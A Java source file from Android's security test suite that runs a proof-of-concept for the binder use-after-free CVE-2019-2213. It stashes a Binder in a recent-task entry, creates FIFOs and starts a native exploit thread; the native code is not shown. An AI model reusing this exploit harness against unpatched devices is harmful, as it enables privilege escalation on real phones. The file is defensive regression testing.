1 /*
2  * Copyright (C) 2019 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 package android.security.cts;
18 
19 import android.system.Os;
20 import android.os.Looper;
21 import android.os.Message;
22 import android.os.ParcelFileDescriptor;
23 import android.os.SystemClock;
24 
25 import android.app.Activity;
26 import android.app.ActivityManager;
27 
28 import android.content.BroadcastReceiver;
29 import android.content.Context;
30 import android.content.ContextWrapper;
31 import android.content.Intent;
32 import android.content.IntentFilter;
33 import android.content.pm.ApplicationInfo;
34 
35 import android.hardware.display.VirtualDisplay;
36 
37 import java.io.IOException;
38 import java.io.BufferedReader;
39 import java.io.InputStream;
40 import java.io.InputStreamReader;
41 
42 import static org.junit.Assert.assertTrue;
43 import androidx.test.InstrumentationRegistry;
44 import androidx.test.runner.AndroidJUnit4;
45 import android.platform.test.annotations.AsbSecurityTest;
46 
47 import java.util.ArrayList;
48 import android.util.Log;
49 
50 import android.graphics.Bitmap;
51 import android.os.Bundle;
52 import android.os.IBinder;
53 import android.system.ErrnoException;
54 import android.widget.TextView;
55 
56 import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
57 
58 import java.io.File;
59 import java.util.List;
60 
61 import org.junit.runner.RunWith;
62 import org.junit.Test;
63 
/**
 * Minimal {@code IBinderExchange} implementation used by the CVE-2019-2213 proof of concept.
 * It holds a single {@link IBinder} that a peer can deposit with {@link #putBinder} and read
 * back with {@link #getBinder}; each call is also mirrored into the owning activity's log.
 *
 * NOTE(review): {@code binder} is written and read without any synchronization. Binder
 * transactions may be dispatched on different pool threads, so cross-thread visibility is not
 * guaranteed here — confirm whether the PoC relies on a specific put/get ordering.
 */
class Exchange extends IBinderExchange.Stub {
    /** Most recently deposited binder; null until putBinder() has been called. */
    IBinder binder;
    /** Owning activity, used only as a log sink. */
    BinderExploitTest.CVE_2019_2213_Activity xpl;

    Exchange(BinderExploitTest.CVE_2019_2213_Activity xpl) {
        this.xpl = xpl;
    }

    /** Stores {@code bnd}, replacing whatever was deposited before. */
    @Override
    public void putBinder(IBinder bnd) {
        xpl.addLog("put binder");
        binder = bnd;
    }

    /** Returns the binder last passed to putBinder(), or null if none was deposited. */
    @Override
    public IBinder getBinder() {
        xpl.addLog("get binder");
        return binder;
    }
}
81 
/**
 * Background thread that runs the native CVE-2019-2213 proof of concept.
 *
 * The native library {@code libcve_2019_2213_jni} is loaded once, when this class is first
 * initialised; {@link #run} then hands the FIFO directory prepared by the activity to the
 * native {@link #runxpl} entry point and blocks until it returns.
 */
class ExploitThread extends Thread {
    static {
        System.loadLibrary("cve_2019_2213_jni");
    }

    /** Activity that receives log lines through addLog(). */
    BinderExploitTest.CVE_2019_2213_Activity xpl;
    /** Directory containing the named pipes the native side communicates over. */
    String pipedir;

    ExploitThread(BinderExploitTest.CVE_2019_2213_Activity xpl, String pipedir) {
        this.xpl = xpl;
        this.pipedir = pipedir;
    }

    /** Runs the native exploit; returns only when runxpl() does. */
    @Override
    public void run() {
        runxpl(pipedir);
    }

    /**
     * Forwards {@code msg} to the activity log. Kept as an instance method so it can be reached
     * from the native side — NOTE(review): presumably called via JNI, confirm against the C++ code.
     */
    void addLog(String msg) {
        xpl.addLog(msg);
    }

    /** Native PoC entry point; {@code pipedir} is the directory returned by makePipes(). */
    public native void runxpl(String pipedir);
}
104 
/**
 * STS/CTS regression test for CVE-2019-2213 (binder use-after-free, b/141496757).
 *
 * The JUnit method only launches {@link CVE_2019_2213_Activity} from this package and then
 * waits; the activity does the real work (stashes a Binder inside a recent-task entry, creates
 * FIFOs in an app-private directory and starts the native PoC on a worker thread). Nothing in
 * this class asserts on the outcome: the test method returns after the wait regardless, so any
 * fail signal has to come from the harness — NOTE(review): confirm how the STS runner evaluates
 * this test (device crash / reboot detection is the usual mechanism for PoC tests).
 */
@RunWith(AndroidJUnit4.class)
public class BinderExploitTest extends StsExtraBusinessLogicTestCase {

    static final String TAG = BinderExploitTest.class.getSimpleName();
    private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";

    /** How long the test waits for the PoC after launching the activity, in seconds. */
    private static final int WAIT_SECONDS = 60;

    public CVE_2019_2213_Activity mActivity;

    /** Starts {@code clazz} from this package as a new task using the instrumentation context. */
    private void launchActivity(Class<? extends Activity> clazz) {
        Context ctx = InstrumentationRegistry.getInstrumentation().getContext();
        Intent launch = new Intent(Intent.ACTION_MAIN)
                .setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName())
                .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        ctx.startActivity(launch);
    }

    /**
     * b/141496757
     *
     * Launches the PoC activity and then sleeps for {@value #WAIT_SECONDS} seconds in
     * one-second slices (the wait is 60 s, not the "5 minutes" an earlier comment claimed).
     * The loop itself never fails the test.
     */
    @AsbSecurityTest(cveBugId = 133758011)
    @Test
    public void testPoc_cve_2019_2213() throws Exception {
        Log.i(TAG, "testPoc_cve_2019_2213 start...");

        launchActivity(CVE_2019_2213_Activity.class);

        // Give the native exploit thread time to run; we only wait, we do not observe it.
        for (int elapsed = 0; elapsed < WAIT_SECONDS; elapsed++) {
            SystemClock.sleep(1000);
        }

        Log.i(TAG, "testPoc_cve_2019_2213 finished.");
    }

    /**
     * Activity that prepares and launches the PoC. {@link #onCreate} deposits an {@link Exchange}
     * binder in a recent-task entry via {@code ActivityManager.addAppTask()}, creates eight FIFOs
     * in an app-private directory and hands that directory to an {@link ExploitThread}. Setup
     * failures are logged rather than propagated.
     */
    public static class CVE_2019_2213_Activity extends Activity {
        ActivityManager actmgr;
        /** Accumulated log text; only mutated under the activity's monitor in addLog(). */
        String log = "";

        /**
         * Appends {@code msg} to the in-memory log and writes the whole accumulated log to
         * logcat under {@code TAG} (the individual line also goes out under "txnuaf").
         */
        synchronized void addLog(String msg) {
            Log.i("txnuaf", msg);
            log += msg + "\n";
            Log.i(TAG, log);
        }

        /** Returns the first of this app's tasks whose base intent carries extras, or null. */
        ActivityManager.AppTask getAppTask() {
            for (ActivityManager.AppTask task : actmgr.getAppTasks()) {
                if (task.getTaskInfo().baseIntent.getExtras() != null) {
                    return task;
                }
            }
            return null;
        }

        /**
         * Registers a new AppTask whose base intent carries an {@link Exchange} binder under
         * the key "bnd", then re-reads the task to confirm the binder survived the round trip
         * through the activity manager. Any pre-existing task with extras is removed first.
         *
         * NOTE(review): parking a Binder in system_server's recent-task list keeps a reference
         * to it alive outside this process; this looks like the lifetime-control mechanism the
         * native PoC depends on — confirm against the JNI side before changing it.
         *
         * @throws Exception if addAppTask() fails or the "bnd" extra cannot be read back
         */
        void setUpBundle() throws Exception {
            actmgr = (ActivityManager) getSystemService(ACTIVITY_SERVICE);

            ActivityManager.AppTask existing = getAppTask();
            if (existing != null) {
                existing.finishAndRemoveTask();
            }

            Bundle extras = new Bundle();
            extras.putBinder("bnd", new Exchange(this));
            Intent base = new Intent(this, CVE_2019_2213_Activity.class);
            base.putExtras(extras);
            base.setFlags(base.getFlags() | Intent.FLAG_ACTIVITY_NEW_DOCUMENT);

            Bitmap icon = Bitmap.createBitmap(1, 1, Bitmap.Config.ALPHA_8);
            if (actmgr.addAppTask(this, base, null, icon) == -1) {
                throw new Exception("addAppTask failed");
            }

            ActivityManager.AppTask added = getAppTask();
            if (added == null) {
                throw new Exception("no appTask with extras");
            }
            Bundle roundTrip = added.getTaskInfo().baseIntent.getExtras();
            if (!roundTrip.containsKey("bnd")) {
                throw new Exception("no bnd key");
            }
            addLog("apptask added");
        }

        /**
         * Creates FIFOs p0..p7 (mode 0600, subject to the process umask) inside the
         * app-private "xpldat" directory (mode 0, i.e. MODE_PRIVATE), replacing any stale
         * ones, and returns the directory path for the native side.
         *
         * @throws ErrnoException if mkfifo fails, e.g. when a stale pipe could not be deleted
         */
        public String makePipes() throws ErrnoException {
            File dir = getDir("xpldat", 0);
            for (int idx = 0; idx < 8; idx++) {
                File fifo = new File(dir, "p" + idx);
                if (fifo.exists()) {
                    fifo.delete();
                }
                Os.mkfifo(fifo.getPath(), 0600);
            }
            return dir.getPath();
        }

        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);

            try {
                setUpBundle();
                String pipeDir = makePipes();
                new ExploitThread(this, pipeDir).start();
            } catch (Exception e) {
                // Setup problems are recorded in the activity log rather than crashing the activity.
                addLog(e.toString());
            }
        }
    }

}